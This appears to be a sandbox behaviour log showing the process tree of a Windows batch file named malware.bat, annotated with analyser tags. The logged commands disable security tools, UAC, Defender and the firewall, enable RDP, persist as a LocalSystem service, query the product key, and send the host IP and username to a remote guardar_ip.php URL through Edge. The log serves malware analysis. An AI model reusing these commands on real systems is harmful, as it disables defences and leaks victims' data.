  C:\Windows\system32\reg.exe (PID 5700)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5508)
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 2340)
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5748)
    reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5932)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 6064)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 6080)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 2444)
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
  C:\Windows\system32\reg.exe (PID 4140)
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
  C:\Windows\system32\reg.exe (PID 4200)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
  C:\Windows\system32\reg.exe (PID 5140)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
  C:\Windows\system32\reg.exe (PID 4712)
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 5608)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\cmd.exe (PID 5612)
    C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
    C:\Windows\system32\ipconfig.exe (PID 5644)
      ipconfig
      - Gathers network information
    C:\Windows\system32\findstr.exe (PID 4716)
      findstr IPv4
  C:\Windows\system32\cmd.exe (PID 5320)
    C:\Windows\system32\cmd.exe /c whoami
    C:\Windows\system32\whoami.exe (PID 5952)
      whoami
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe (PID 6096)
    C:\Windows\system32\cmd.exe /c net user "YCLEXTAL$"
    C:\Windows\system32\net.exe (PID 2444)
      net user "YCLEXTAL$"
  C:\Windows\system32\takeown.exe (PID 5288)
    takeown /f "C:\Windows\System32\notepad.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\icacls.exe (PID 5336)
    icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
    - Possible privilege escalation attempt
    - Modifies file permissions
  C:\Windows\system32\manage-bde.exe (PID 5348)
    manage-bde -off C:
  C:\Windows\system32\manage-bde.exe (PID 5512)
    manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
  C:\Windows\system32\bcdedit.exe (PID 5820)
    bcdedit /set {default} recoveryenabled yes
    - Modifies boot configuration data using bcdedit
  C:\Windows\system32\bcdedit.exe (PID 4808)
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit
  C:\Windows\system32\sc.exe (PID 5672)
    sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
    - Launches sc.exe
  C:\Windows\system32\net.exe (PID 3800)
    net start MiServicio
    C:\Windows\system32\net1.exe (PID 5752)
      C:\Windows\system32\net1 start MiServicio
  C:\Windows\system32\takeown.exe (PID 3328)
    takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\icacls.exe (PID 2440)
    icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
    - Possible privilege escalation attempt
    - Modifies file permissions
C:\Windows\system32\OpenWith.exe (PID 5936)
  C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\OpenWith.exe (PID 5732)
  C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\OpenWith.exe (PID 4192)
  C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\cmd.exe (PID 2604)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
  C:\Windows\system32\net.exe (PID 1820)
    net session
    C:\Windows\system32\net1.exe (PID 2212)
      C:\Windows\system32\net1 session
  C:\Windows\system32\powercfg.exe (PID 4968)
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\powercfg.exe (PID 3960)
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\powercfg.exe (PID 6108)
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\powercfg.exe (PID 884)
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\netsh.exe (PID 4920)
    netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
    - Modifies Windows Firewall
  C:\Windows\system32\netsh.exe (PID 5444)
    netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
    - Modifies Windows Firewall
  C:\Windows\system32\netsh.exe (PID 3104)
    netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
    - Modifies Windows Firewall
  C:\Windows\system32\netsh.exe (PID 3672)
    netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
    - Modifies Windows Firewall
  C:\Windows\system32\netsh.exe (PID 5184)
    netsh advfirewall set allprofiles state off
    - Modifies Windows Firewall
  C:\Windows\system32\reg.exe (PID 4568)
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  C:\Windows\system32\reg.exe (PID 1228)
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 2656)
    REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
  C:\Windows\system32\reg.exe (PID 320)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 1536)
    reg add "HKCU\Control Panel\Desktop\MuiCached" /f
  C:\Windows\system32\reg.exe (PID 1496)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /f
  C:\Windows\system32\reg.exe (PID 2436)
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
  C:\Windows\system32\reg.exe (PID 5200)
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
  C:\Windows\system32\reg.exe (PID 2800)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
  C:\Windows\system32\reg.exe (PID 5332)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
  C:\Windows\system32\reg.exe (PID 5628)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
  C:\Windows\system32\reg.exe (PID 5604)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5516)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5716)
    reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
  C:\Windows\system32\reg.exe (PID 5772)
    reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
  C:\Windows\system32\reg.exe (PID 4216)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5556)
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5812)
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 2892)
    reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5844)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 3132)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 2000)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5704)
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
  C:\Windows\system32\reg.exe (PID 3836)
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
  C:\Windows\system32\reg.exe (PID 5804)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
  C:\Windows\system32\reg.exe (PID 5304)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
  C:\Windows\system32\reg.exe (PID 3852)
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
  C:\Windows\system32\reg.exe (PID 5572)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe (PID 5152)
    C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
    C:\Windows\system32\ipconfig.exe (PID 5532)
      ipconfig
      - Gathers network information
    C:\Windows\system32\findstr.exe (PID 5148)
      findstr IPv4
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5964)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.216
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4648)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1328)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2396)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5492)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5008)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2748)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 380)
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 4468)
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1668)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4436)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:13⤵PID:3960
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:13⤵PID:1904
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:13⤵PID:2412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:13⤵PID:5320
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:13⤵PID:4848
-
C:\Windows\system32\cmd.exe  [depth 2, PID 4432]
  cmdline: C:\Windows\system32\cmd.exe /c whoami

C:\Windows\system32\whoami.exe  [depth 3, PID 5868]
  cmdline: whoami
  - Suspicious use of AdjustPrivilegeToken

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [depth 2, PID 1244]
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin123

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [depth 3, PID 4836]
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [depth 2, PID 1536]
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=yclextal\admin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [depth 3, PID 4844]
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x40,0x104,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718

C:\Windows\system32\cmd.exe  [depth 2, PID 2064]
  cmdline: C:\Windows\system32\cmd.exe /c net user "Admin"

C:\Windows\system32\net.exe  [depth 3, PID 2016]
  cmdline: net user "Admin"

C:\Windows\system32\net1.exe  [depth 4, PID 928]
  cmdline: C:\Windows\system32\net1 user "Admin"
C:\Windows\system32\takeown.exe  [depth 2, PID 5840]
  cmdline: takeown /f "C:\Windows\System32\notepad.exe"
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\icacls.exe  [depth 2, PID 5804]
  cmdline: icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
  - Possible privilege escalation attempt
  - Modifies file permissions

C:\Windows\system32\manage-bde.exe  [depth 2, PID 3164]
  cmdline: manage-bde -off C:

C:\Windows\system32\manage-bde.exe  [depth 2, PID 5108]
  cmdline: manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"

C:\Windows\system32\bcdedit.exe  [depth 2, PID 5148]
  cmdline: bcdedit /set {default} recoveryenabled yes
  - Modifies boot configuration data using bcdedit

C:\Windows\system32\bcdedit.exe  [depth 2, PID 5880]
  cmdline: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  - Modifies boot configuration data using bcdedit

C:\Windows\system32\sc.exe  [depth 2, PID 5232]
  cmdline: sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
  - Launches sc.exe

C:\Windows\system32\net.exe  [depth 2, PID 3520]
  cmdline: net start MiServicio

C:\Windows\system32\net1.exe  [depth 3, PID 780]
  cmdline: C:\Windows\system32\net1 start MiServicio

C:\Windows\system32\cmd.exe  [depth 2, PID 5476]
  cmdline: C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"

C:\Windows\system32\reg.exe  [depth 3, PID 5772]
  cmdline: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"

C:\Windows\system32\find.exe  [depth 3, PID 1472]
  cmdline: find "BackupProductKeyDefault"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [depth 2, PID 5588]
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [depth 3, PID 5140]
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
C:\Windows\System32\CompPkgSrv.exe  [depth 1, PID 4556]
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe  [depth 1, PID 5896]
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe  [depth 1, PID 2556]
  cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
  - Modifies data under HKEY_USERS

C:\Windows\system32\net.exe  [depth 2, PID 3080]
  cmdline: net session

C:\Windows\system32\net1.exe  [depth 3, PID 5972]
  cmdline: C:\Windows\system32\net1 session

C:\Windows\system32\powercfg.exe  [depth 2, PID 5660]
  cmdline: powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\powercfg.exe  [depth 2, PID 4796]
  cmdline: powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\powercfg.exe  [depth 2, PID 4556]
  cmdline: powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\powercfg.exe  [depth 2, PID 764]
  cmdline: powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\netsh.exe  [depth 2, PID 5848]
  cmdline: netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe  [depth 2, PID 5624]
  cmdline: netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe  [depth 2, PID 4932]
  cmdline: netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe  [depth 2, PID 5520]
  cmdline: netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
  - Modifies Windows Firewall
  - Modifies data under HKEY_USERS

C:\Windows\system32\netsh.exe  [depth 2, PID 2412]
  cmdline: netsh advfirewall set allprofiles state off
  - Modifies Windows Firewall
C:\Windows\system32\reg.exe  [depth 2, PID 5756]
  cmdline: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe  [depth 2, PID 996]
  cmdline: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 4968]
  cmdline: REG IMPORT "C:\Windows\TEMP\disable_winload.reg"

C:\Windows\system32\reg.exe  [depth 2, PID 6032]
  cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 5588]
  cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached" /f

C:\Windows\system32\reg.exe  [depth 2, PID 1216]
  cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /f

C:\Windows\system32\reg.exe  [depth 2, PID 676]
  cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f

C:\Windows\system32\reg.exe  [depth 2, PID 5304]
  cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f

C:\Windows\system32\reg.exe  [depth 2, PID 4932]
  cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f

C:\Windows\system32\reg.exe  [depth 2, PID 708]
  cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f

C:\Windows\system32\reg.exe  [depth 2, PID 4924]
  cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

